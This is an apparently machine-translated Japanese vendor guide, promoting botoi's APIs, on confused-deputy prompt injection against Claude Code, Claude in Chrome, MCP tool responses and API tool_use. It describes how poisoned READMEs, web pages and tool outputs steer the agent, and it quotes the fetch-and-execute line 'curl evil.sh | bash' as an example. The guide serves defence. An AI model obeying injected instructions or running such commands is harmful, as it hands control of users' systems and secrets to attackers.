コンテンツへスキップ
Guide

クロードの混乱した副監査マトリックス: 4 つの死角、3 つのガードレール

| 8 min read

4 つの研究チームが、2026 年 5 月 6 日から 7 日にかけてクロード プロンプト インジェクションの調査結果を発表しました。各盲点を具体的なガードレール (URL チェック、PII スキャン、シェル ホワイトリスト) にマッピングする監査マトリックスは、今週出荷できます。

Security audit checklist representing Claude confused-deputy guardrails
Photo by Towfiqu barbhuiya on Unsplash

2026 年 5 月 6 日から 7 日にかけて、4 つの別々の研究チームがクロード プロンプトに関する調査結果を発表しました。 注射。 ほとんどの報道では、これらを 3 つの異なるストーリーとして扱っていました。 それらは同じ話です。 クロードが制御を行う攻撃者に代わってアクションを実行する混乱した代理問題 コンテキスト ウィンドウ内の信頼できないコンテンツ。

クローンされたリポジトリ内の README は、Claude Code を通じてシェル コマンドを実行できます。 クロードのウェブページ Chrome は、エージェントに攻撃者の URL を取得させることができます。 MCP ツールの応答で命令を挿入できる 次のツール呼び出しが従うことを確認します。 モデルは言われたことを実行します。 問題はモデルです 誰が話しているのかわかりません。

人造船の部分防御(クロード・コードの許可プロンプト、 クロムのクロード)。 残りはあなたのものです。 以下は、各盲点を監査マトリックスにマッピングしたものです。 具体的なガードレールとワンコール API チェックを今すぐ MCP ゲートウェイに導入できます。

4つの盲点

表面 攻撃ベクトル 何が動くのか ネイティブ ガードレール
クロード・コード 汚染された README、パッケージ postinstall、または git commit body シェルコマンド、ファイル書き込み、gitプッシュ 許可プロンプト
クロムのクロード ユーザーリクエストを装ったWebページの指示 クリック、フォーム送信、リンクフォロー 動作確認
クロード デスクトップ + MCP ツールの応答には次の呼び出しの指示が含まれます 連鎖した MCP ツール呼び出し、ファイル読み取り、ネットワークフェッチ ツール同意ダイアログ
API tool_use ツール結果ブロック内の信頼できない文字列 次のターンで何が決まるとしても デフォルトではなし

各ネイティブ ガードレールは明らかなケース (ユーザーが要求していないシェル コマンド) を検出し、 微妙なもの (ユーザーが見たことのない類似ホストへの「無害な」カール) を見逃します。 修正 これは、プロンプト層ではなく、ツール層での多層防御です。

ガードレール 1: エージェントがアクセスするすべての URL をフィッシング チェックする

最も一般的な混乱した代理のエスカレーションは、「この URL にアクセスして、内容を教えてください」というものです。 の URL は攻撃者のものです。 エージェントが次に読み取るデータが入力になります。 フィッシングを実行する エージェントが元のユーザー プロンプトで確認できなかったすべての URL を確認します。

コミットが固定されていない匿名 Gist でホストされている生の実行可能ファイルは古典的です プロンプトインジェクションからシェル実行までのチェーン。 評決は 100 ミリ秒以内に返されます。 キャッシュする方法 10分間のURLハッシュ。 判定が以下のものであるツール呼び出しをドロップした場合 clean

ガードレール 2: すべての MCP ツール応答に対する PII および秘密スキャン

2 番目のエスカレーションは、ツールの応答ポイズニングです。 MCP ツールは 4 KB の JSON BLOB を返します。 どこかで その blob には命令文字列が含まれています。 クロードは blob 全体を読み取り、命令が勝ちます。 の BLOB は他の場所で収集された認証情報を漏洩する可能性もあり、最終的にはモデルの推論に影響を及ぼします。 トレースと会話ログ。

ライブ認証情報が含まれている場合、ツールの応答がモデルに到達するのをブロックします。 メールを編集する ユーザーが要求しない限り、電話も使用できます。 デフォルトでは、すべての MCP サーバーを信頼できないものとして扱います。 あなた 誰が上流のデータ ソースを汚染したのかはわかりません。

ガードレール 3: ゲートウェイのハード ホストおよびシェル ホワイトリスト

3 番目のエスカレーションは、企業に噛みつくものです。密かに独自の領域を拡大するエージェントです。 届く。 README により Claude Code の実行が保証されます curl evil.sh | bash 「セットアップ用です。」 あ ウェブページは、Chrome のクロードに類似ドメインでフォームを送信するよう説得します。 どちらの攻撃も死ぬ 固定ホワイトリストに対して:

ホワイトリストは退屈です。 退屈がポイントだ。 許可リストから逃れるすべてのアクションは、 すぐに失敗するか、ユーザーが読む必要があるプロンプトが表示されます。 エージェントは内部でも役に立ちます。 砂場であり、その外では無害です。

それを配線する 60 回線の MCP ゲートウェイ

3 つのガードレールはすべて、クロードとすべての MCP の間にある 1 つのミドルウェア機能内に存在します。 サーバー。 ツールの応答から URL を抽出し、信頼できるホスト セットと照合してチェックします。 セッション許可リストを取得し、PII スキャンを実行し、構造化ブロック決定をホスト アプリケーションに返します。 ユーザーに表面化することができます:

信頼できるホスト セットには独自の API が保持されます。 セッション許可リストは空から始まり、時間とともに増加します。 ユーザーはセッション中にホストを明示的に承認します。 キャッシングにより、小切手は実質的に無料になります。 URL を繰り返します (ページネーション、再試行、ツール呼び出し間での同じドキュメント ページを考えてください)。

まだゲートウェイを実行できない場合は、安価なバージョンを実行してください。すべての URL とすべてのシェル コマンドをログに記録します。 エージェントは構造化ストアを提案し、ホストにヒットしなかったものについては警告を発します。 事前承認します。 予防なしの検出はどちらにも勝りません。

これが多層防御の姿勢に適合する場合

監査マトリックスは、Anthropic 自身の成果に代わるものではありません。 それはあなたがコントロールするレイヤーです。 あ 賢明な分割:

  • Anthropic がモデルを所有しています。 プロンプトインジェクションの堅牢性、命令階層 トレーニング、拒否行動。
  • あなたはツール サーフェスを所有しています。 URL 検証、PII スクラビング、ホストとシェル ホワイトリスト、MCP サーバー インベントリ。
  • IdP は ID を所有しています。 エージェントの有効期間の短いトークン、セッションごと 監査、資格情報を人間のユーザーから分離します。

どのレイヤーもスキップすると、次の混乱した代理レポートにインシデントが含まれます。 5月6日~7日の調査 は、四半期ごとのニュース サイクルになる前に、すべてのチームが出荷する必要がある内容の無料プレビューです。

重要なポイント

  • 4 つの盲点、1 つの根本原因。 クロードはすべてのトークンを潜在的なものとして扱います 指示を伴う。 コンテキスト内の信頼できないコンテンツは、受動的読み取りではなく、アクション ベクトルです。
  • ツールが提案するすべての URL に対する URL フィッシング チェック。 1 回の API 呼び出し、100 ミリ秒、 キャッシュされた。 最も一般的なプロンプトインジェクションエスカレーションチェーンを削除します。
  • MCP ツールの応答ごとに PII スキャンを実行します。 による認証情報の漏洩をブロックします。 ツールの結果ポイズニングを防止し、秘密が会話ログに残らないようにします。
  • ゲートウェイのハード ホワイトリスト。 シェル コマンドとホストのホワイトリストにより、 「静かに範囲を広げる」エスカレーション。 退屈、有限、効率的。
  • 多層防御の分割。 Anthropic はモデルを所有し、あなたはツール サーフェスを所有します。 IdP が ID を所有します。 レイヤーをスキップすると、次のリサーチ ドロップで名前が付けられます。

ボトイの展示品 /v1/phishing/check/v1/pii/detect/v1/url-metadata、および 1 つの API キーの背後にさらに約 200 の単一目的エンドポイント 5 リクエスト/分は無料です。 それらを MCP ゲートウェイに接続するか、Claude Code 自体から次のように呼び出します。 の ボットイ MCP サーバー。 閲覧する インタラクティブドキュメント 始めます。

FAQ

クロード混乱代理問題とは何ですか?
混乱した代理攻撃は、特権プロセス (Claude Code、Chrome では Claude) が、入力の一部を制御する攻撃者に代わってアクションを実行するときに発生します。 2026 年 5 月 6 日から 7 日にかけて、4 つの研究チームは、信頼できないコンテンツ (README、Web ページ、MCP ツールの応答) にユーザーのリクエストと思われる指示が含まれている場合、クロードがだまされてシェル コマンドの実行、データの流出、または攻撃者の URL へのアクセスを引き起こす可能性があることを示す調査結果を発表しました。
どのクロード サーフェスが影響を受けますか?
クロード コード (リポジトリ ファイルを読み取る CLI エージェント)、Chrome のクロード (Web ページを読み取るブラウズ エージェント)、MCP サーバーを備えたクロード デスクトップ (ツールの応答に命令を伝えることができる)、tool_use の結果に攻撃者が制御する文字列が含まれる場合の API。 根本的な問題は 4 つすべてで同じです。クロードは、コンテキスト内のすべてのトークンを潜在的に命令を含むものとして扱います。
Anthropic 社はこれに対応するガードレールを備えていますか?
はい、部分的にです。 Claude Code には、シェルとファイルの書き込みに対する権限システムがあります。 Chrome の Claude にはアクション確認レイヤーがあります。 どちらも、断固とした攻撃者がソーシャル エンジニアリングを使ってプロンプト インジェクションを連鎖させるのを阻止するものではありません。 多層防御レイヤーはあなたのものです。エージェントが提案するすべての URL を検証し、IOC のすべてのツール応答をスキャンし、API ゲートウェイでのブラスト半径を制限します。
これは通常の即時注入とどう違うのですか?
従来のプロンプト挿入は出力テキストで終了します。 混乱した代理人は行動で終わります。シェルコマンドが実行され、URL が取得され、Webhook が起動され、資金が移動します。 修正は、テキストが生成される場所 (モデル) ではなく、アクションが発生する場所 (ツール層) に存在する必要があります。 このため、ガードレール プロキシと URL 検証は、迅速な強化よりも重要です。
今週は最低限何を追加する必要がありますか?
3つのこと。 エージェントがユーザー プロンプトに表示されなかったドメインを取得またはリンクする前に、URL フィッシング チェックを行います。 MCP ツールの応答がクロードのコンテキストに入る前に、すべての MCP ツールの応答に対する PII と秘密のスキャン。 そして、ゲートウェイ層でのシェル コマンドまたは HTTP ホストのハード ホワイトリスト。 それぞれが 1 つの API 呼び出しと 1 つの構成ブロックです。

botoiで開発を始めよう

150以上のAPIエンドポイント。検索、テキスト処理、画像生成、開発者ユーティリティに対応。無料プラン、クレジットカード不要。